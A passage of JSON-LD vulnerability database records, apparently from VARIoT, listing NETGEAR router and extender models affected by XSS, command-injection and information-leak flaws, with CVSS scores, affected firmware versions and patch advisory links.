"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38534"
},
{
"date": "2022-07-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-010450"
},
{
"date": "2021-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-946"
},
{
"date": "2021-08-11T00:17:22.217000",
"db": "NVD",
"id": "CVE-2021-38534"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-19T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38534"
},
{
"date": "2022-07-01T06:13:00",
"db": "JVNDB",
"id": "JVNDB-2021-010450"
},
{
"date": "2021-08-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-946"
},
{
"date": "2021-08-19T17:59:26.163000",
"db": "NVD",
"id": "CVE-2021-38534"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-946"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0NETGEAR\u00a0 Cross-site scripting vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010450"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-946"
}
],
"trust": 0.6
}
}
var-202004-0804
Vulnerability from variot
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D6220 before 1.0.0.40, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.24, R6400 before 1.0.1.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.48. plural NETGEAR A device contains an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000 etc. are all products of NETGEAR company. NETGEAR EX7000 is a wireless network signal extender. NETGEAR DGN2200 is a wireless router. NETGEAR R6400 is a wireless router. The vulnerability stems from the fact that the network system or product does not properly filter special elements in the process of constructing executable commands from external input data. Attackers can use this vulnerability to execute illegal commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0804",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.10"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.20"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.26"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "dgnd2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.48"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.24"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "dgnd2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "ex6150v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.48"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "dgnd2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.24"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015435"
},
{
"db": "NVD",
"id": "CVE-2019-20732"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgnd2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6120_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015435"
}
]
},
"cve": "CVE-2019-20732",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-20732",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015435",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2021-63379",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20732",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2019-20732",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.7,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015435",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20732",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20732",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2019-015435",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2021-63379",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1343",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015435"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1343"
},
{
"db": "NVD",
"id": "CVE-2019-20732"
},
{
"db": "NVD",
"id": "CVE-2019-20732"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D6220 before 1.0.0.40, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.24, R6400 before 1.0.1.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.48. plural NETGEAR A device contains an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000 etc. are all products of NETGEAR company. NETGEAR EX7000 is a wireless network signal extender. NETGEAR DGN2200 is a wireless router. NETGEAR R6400 is a wireless router. The vulnerability stems from the fact that the network system or product does not properly filter special elements in the process of constructing executable commands from external input data. Attackers can use this vulnerability to execute illegal commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20732"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015435"
},
{
"db": "CNVD",
"id": "CNVD-2021-63379"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20732",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015435",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-63379",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1343",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015435"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1343"
},
{
"db": "NVD",
"id": "CVE-2019-20732"
}
]
},
"id": "VAR-202004-0804",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63379"
}
],
"trust": 1.1051469602777777
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63379"
}
]
},
"last_update_date": "2024-11-23T22:48:02.101000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Post-Authentication Command Injection on Some Routers, Gateways, and Extenders, PSV-2017-2228",
"trust": 0.8,
"url": "https://kb.netgear.com/000061195/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2228"
},
{
"title": "Patch for Command injection vulnerabilities in multiple NETGEAR products (CNVD-2021-63379)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/287166"
},
{
"title": "Multiple NETGEAR Fixing measures for product injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116892"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015435"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1343"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "CWE-74",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015435"
},
{
"db": "NVD",
"id": "CVE-2019-20732"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20732"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000061195/security-advisory-for-post-authentication-command-injection-on-some-routers-gateways-and-extenders-psv-2017-2228"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20732"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-63379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015435"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1343"
},
{
"db": "NVD",
"id": "CVE-2019-20732"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-63379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015435"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1343"
},
{
"db": "NVD",
"id": "CVE-2019-20732"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-63379"
},
{
"date": "2020-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015435"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1343"
},
{
"date": "2020-04-16T20:15:13.447000",
"db": "NVD",
"id": "CVE-2019-20732"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-63379"
},
{
"date": "2020-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015435"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1343"
},
{
"date": "2024-11-21T04:39:12.800000",
"db": "NVD",
"id": "CVE-2019-20732"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1343"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Injection vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015435"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1343"
}
],
"trust": 0.6
}
}
var-202004-1575
Vulnerability from variot
plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1575",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wnr1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "r6080",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.16"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.48"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "d1500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "d6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.00.30"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.32"
},
{
"model": "jnr1010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "wnr2050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.24"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.124"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.68"
},
{
"model": "d6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "wndr4300",
